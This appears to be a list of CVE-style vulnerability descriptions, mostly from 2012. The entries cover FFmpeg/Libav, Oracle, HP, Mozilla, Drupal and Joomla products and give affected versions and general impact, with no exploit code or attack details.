Multiple unspecified vulnerabilities in the (1) decode_band_hdr function in indeo4.c and (2) ff_ivi_decode_blocks function in ivi_common.c in libavcodec/ in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, have unknown impact and attack vectors, related to the "transform size."
Unspecified vulnerability in the read_var_block_data function in libavcodec/alsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to the "number of decoded samples in first sub-block in BGMC mode."
Unspecified vulnerability in the avi_read_packet function in libavformat/avidec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to a large number of vector coded coefficients (num_vec_coeffs).
Unspecified vulnerability in the avi_read_packet function in libavformat/avidec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an "out of array read" when a "packet is shrunk."
Unspecified vulnerability in the decode_frame function in libavcodec/indeo4.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to the "setup width/height."
Unspecified vulnerability in the decode_wdlt function in libavcodec/dfa.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an "out of array write."
Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 have unknown impact and attack vectors, related to (1) "some subframes only encode some channels" or (2) a large order value.
Unspecified vulnerability in the decode_pic function in libavcodec/cavsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to "width/height changing in CAVS," a different vulnerability than CVE-2012-2777.
Unspecified vulnerability in libavcodec/vp56.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, has unknown impact and attack vectors, related to "freeing the returned frame."
Unspecified vulnerability in the decode_slice_header function in libavcodec/h264.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to a "rejected resolution change."
Unspecified vulnerability in FFmpeg before 0.10.3 has unknown impact and attack vectors, a different vulnerability than CVE-2012-2771, CVE-2012-2773, CVE-2012-2778, and CVE-2012-2780.
Unspecified vulnerability in FFmpeg before 0.10.3 has unknown impact and attack vectors, a different vulnerability than CVE-2012-2771, CVE-2012-2773, CVE-2012-2778, and CVE-2012-2781.
Unspecified vulnerability in the decode_frame function in libavcodec/indeo5.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an invalid "gop header" and decoding in a "half initialized context."
Unspecified vulnerability in FFmpeg before 0.10.3 has unknown impact and attack vectors, a different vulnerability than CVE-2012-2771, CVE-2012-2773, CVE-2012-2780, and CVE-2012-2781.
Unspecified vulnerability in the decode_pic function in libavcodec/cavsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to "width/height changing in CAVS," a different vulnerability than CVE-2012-2784.
Unspecified vulnerability in the decode_cell_data function in libavcodec/indeo3.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to an "out of picture write."
Unspecified vulnerability in the read_var_block_data function in libavcodec/alsdec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to a large order and an "out of array write in quant_cof."
Unspecified vulnerability in FFmpeg before 0.10.3 has unknown impact and attack vectors, a different vulnerability than CVE-2012-2771, CVE-2012-2778, CVE-2012-2780, and CVE-2012-2781.
Unspecified vulnerability in the ff_rv34_decode_frame function in libavcodec/rv34.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to "width/height changing with frame threading."
Unspecified vulnerability in FFmpeg before 0.10.3 has unknown impact and attack vectors, a different vulnerability than CVE-2012-2773, CVE-2012-2778, CVE-2012-2780, and CVE-2012-2781.
Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown impact and attack vectors related to a "Security Fix", aka Bug #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of 20120816, Oracle has not commented on this possibility.
Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote attackers to gain privileges via unknown attack vectors related to "Inadequate checking."
Unspecified vulnerability in the _php_stream_scandir function in the stream implementation in PHP before 5.3.15 and 5.4.x before 5.4.5 has unknown impact and remote attack vectors, related to an "overflow."
Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.6, 0.5.x before 0.5.5, 0.6.0.x before 0.6.0.7, and 0.6.x before 0.6.2 allows remote attackers to cause a denial of service (block-processing outage and incorrect block count) via unknown behavior on a Bitcoin network.
The default configuration of the TP-Link 8840T router enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors.
The default configuration of the NETGEAR ProSafe FVS318N firewall enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in wp-includes/js/swfobject.js in WordPress before 3.3.2 has unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in the Addressbook module for Drupal 6.x-4.2 and earlier allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in EMC RSA Adaptive Authentication On-Premise (AAOP) 6.0.2.1 before SP3 P3 allows remote attackers to obtain sensitive information via unknown vectors.
IBM XIV Storage System 2810-A14 and 2812-A14 devices before level 10.2.4.e-2 and 2810-114 and 2812-114 devices before level 11.1.1 have hardcoded passwords for unspecified accounts, which allows remote attackers to gain user access via unknown vectors. IBM X-Force ID: 75041.
Cross-site request forgery (CSRF) vulnerability in the CDN2 Video module 6.x for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the ShareThis module 7.x-2.x before 7.x-2.3 for Drupal allows remote attackers to hijack the authentication of users with administer sharethis permissions via unknown vectors "outside of the Form API."
Unspecified vulnerability in certain default views in the Ubercart Views module 6.x before 6.x-3.2 for Drupal allows remote attackers to obtain sensitive information via unknown attack vectors.
Cross-site request forgery (CSRF) vulnerability in the Admin tools module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors involving "not checking tokens."
Cross-site request forgery (CSRF) vulnerability in the Ubercart Bulk Stock Updater module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors related to formAPI.
Cross-site request forgery (CSRF) vulnerability in the Content Lock module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Adobe ColdFusion 10 and earlier allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Operations Agent before 11.03.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1326.
Unspecified vulnerability in HP Operations Agent before 11.03.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1325.
Unspecified vulnerability on HP Photosmart Wireless e-All-in-One B110, e-All-in-One D110, Plus e-All-in-One B210, eStation All-in-One C510, Ink Advantage e-All-in-One K510, and Premium Fax e-All-in-One C410 printers allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.1.1 allows local users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.1.1 allows remote authenticated users to gain privileges and obtain sensitive information via unknown vectors.
HP System Management Homepage (SMH) before 7.1.1 does not properly validate input, which allows remote authenticated users to have an unspecified impact via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.1.1 allows remote attackers to cause a denial of service, or possibly obtain sensitive information or modify data, via unknown vectors.
Unspecified vulnerability in HP Performance Insight for Networks 5.3.x, 5.41, 5.41.001, and 5.41.002 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to modify data or cause a denial of service via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in HP System Health Application and Command Line Utilities before 9.0.0 allow remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.0 allows remote authenticated users to obtain sensitive information or modify data via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.0 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-1997.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.0 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-1998.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.0 allows remote attackers to modify data via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.0 allows local users to obtain sensitive information or modify data via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.0 allows local users to modify data or obtain sensitive information via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 15.0, Thunderbird before 15.0, and SeaMonkey before 2.12 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to garbage collection after certain MethodJIT execution, and unknown other vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, Thunderbird ESR 10.x before 10.0.7, and SeaMonkey before 2.12 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 13.0, Thunderbird 5.0 through 13.0, and SeaMonkey before 2.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 13.0, Thunderbird before 13.0, and SeaMonkey before 2.10 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to (1) methodjit/ImmutableSync.cpp, (2) the JSObject::makeDenseArraySlow function in js/src/jsarray.cpp, and unknown other components.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
The Quantum Scalar i500 tape library with firmware before i7.0.3 (604G.GS00100), also distributed as the Dell ML6000 tape library with firmware before A20-00 (590G.GS00100) and the IBM TS3310 tape library with firmware before R6C (606G.GS001), uses default passwords for unspecified user accounts, which makes it easier for remote attackers to obtain access via unknown vectors.
An unspecified ActiveX control in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to overwrite arbitrary files via unknown vectors.
The web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 does not require authentication, which allows remote attackers to perform unspecified functions via unknown vectors.
Unspecified vulnerability in IBM Tivoli Monitoring Agent (ITMA), as used in IBM DB2 9.5 before FP9 on UNIX, allows local users to gain privileges via unknown vectors.
The Media Upload form in the Video Embed &amp; Thumbnail Generator plugin before 2.0 for WordPress allows remote attackers to obtain the installation path via unknown vectors.
Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2.1.39.5101 has unknown impact and attack vectors, a different vulnerability than CVE-2007-5779 and CVE-2012-1264.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1769, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1767, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-3109.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1766, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2012-1767, CVE-2012-1769, CVE-2012-1770, CVE-2012-1771, CVE-2012-1772, CVE-2012-1773, CVE-2012-3106, CVE-2012-3107, CVE-2012-3108, and CVE-2012-3110.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect integrity via unknown vectors related to Branded Zone.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to UI Framework.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1742.
Unspecified vulnerability in the Oracle AutoVue component in Oracle Supply Chain Products Suite 20.0.2 and 20.1 allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-1758.
Unspecified vulnerability in the Oracle AutoVue component in Oracle Supply Chain Products Suite 20.0.2 and 20.1 allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-1759.
Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1732.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to PC.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to flashback archive.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to mailx.
Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1 and 11.1.1.5 allows remote attackers to affect confidentiality via unknown vectors related to Oracle Maps.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Candidate Gateway, a different vulnerability than CVE-2012-0562.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1746.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1747.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent users to affect availability via unknown vectors related to Outside In Filters.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1760.
Unspecified vulnerability in the Enterprise Manager for Fusion Middleware component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to User Administration Pages.
Unspecified vulnerability in the Oracle Application Express Listener component in Oracle Application Express Listener 1.1-ea, 1.1.1, 1.1.2, and 1.1.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Financials Business Intelligence.
Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite Java System Web Server 6.1 and Oracle iPlanet Web Server 7.0 allows remote attackers to affect availability via unknown vectors related to Web Server.
Unspecified vulnerability in the Enterprise Manager for Oracle Database component in Oracle Database Server 11.1.0.7, 11.2.0.2, and 11.2.0.3, and Enterprise Manager Grid Control EM Base Platform 10.2.0.5, EM Base Platform 11.1.0.1, EM Plugin for DB 12.1.0.1, and EM Plugin for DB 12.1.0.2, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to DB Performance Advisories/UIs.
Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1 allows remote attackers to affect confidentiality via unknown vectors related to Oracle Maps.
Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality via unknown vectors related to CM.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1754.
Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Password Management.
Unspecified vulnerability in the Hyperion BI+ component in Oracle Hyperion 11.1.1.3 and earlier allows remote attackers to affect integrity via unknown vectors related to UI and Visualization.
Unspecified vulnerability in the Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Portal Framework.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Document Repository.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, and 5 update 35 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, and 6 update 32 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2012-1721.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, and 6 update 32 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2012-1722.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier, when running on Solaris, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows local users to affect confidentiality via unknown vectors related to printing on Solaris or Linux.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, and 5 update 35 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
Unspecified vulnerability in a TList 6 ActiveX control in Oracle Hyperion Financial Management 11.1.1.4 and 11.1.2.1.104 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, 1.4.2_37 and earlier, and JavaFX 2.1 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Directory traversal vulnerability in the Liferay component in Oracle Sun GlassFish Web Space Server before 10.0 Update 7 Patch 2 has unknown impact and attack vectors.
Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer, a different vulnerability than CVE-2012-1709.
Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer, a different vulnerability than CVE-2012-1710.
Unspecified vulnerability in the Application Express component in Oracle Database Server 4.0 and 4.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Core-Base, a different vulnerability than CVE-2012-1704.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Logging.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Core-Base, a different vulnerability than CVE-2012-1707.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer, a different vulnerability than CVE-2012-1690.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Highly Interactive Web UI.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Siebel UI Framework.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.19 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Oracle JRockit component in Oracle Fusion Middleware 28.2.2 and earlier, and JDK/JRE 5 and 6 27.7.1 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel/Privileges.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer, a different vulnerability than CVE-2012-1703.
Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Oracle Business Intelligence Enterprise Edition component in Oracle Fusion Middleware 11.1.1.6 and other versions allows remote attackers to affect integrity via unknown vectors related to Installation.
Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization 4.6 allows remote attackers to affect integrity via unknown vectors related to Core.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Password Policy.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to gssd.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-3136.  NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to "XMLDecoder security issue via ClassFinder."
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect availability via unknown vectors related to Kernel/sockfs.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Siebel Apps - Multi-channel Technologies.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect integrity via unknown vectors related to Core-Base.
Unspecified vulnerability in the Oracle Application Server Single Sign-On component in Oracle Fusion Middleware allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Virtual Banking.
Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI, a different vulnerability than CVE-2012-0582.
Unspecified vulnerability in the UC PayDutchGroup / WeDeal payment module 6.x-1.0 for Drupal allows remote authenticated users to obtain account credentials via unknown attack vectors.
Joomla! 2.5.x before 2.5.4 does not properly check permissions, which allows attackers to obtain sensitive "administrative back end" information via unknown attack vectors.  NOTE: this might be a duplicate of CVE-2012-1599.
Joomla! 1.5.x before 1.5.26 does not properly check permissions, which allows attackers to obtain sensitive "administrative back end information" via unknown vectors.  NOTE: this might be a duplicate of CVE-2012-1611.
Unspecified vulnerability in ez Publish 4.1.4, 4.2, 4.3, 4.4, 4.5, and 4.6 has unknown impact and attack vectors related to an insecure direct object reference.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from a third party that the issue is due to an invalid type cast in the JSObject class.
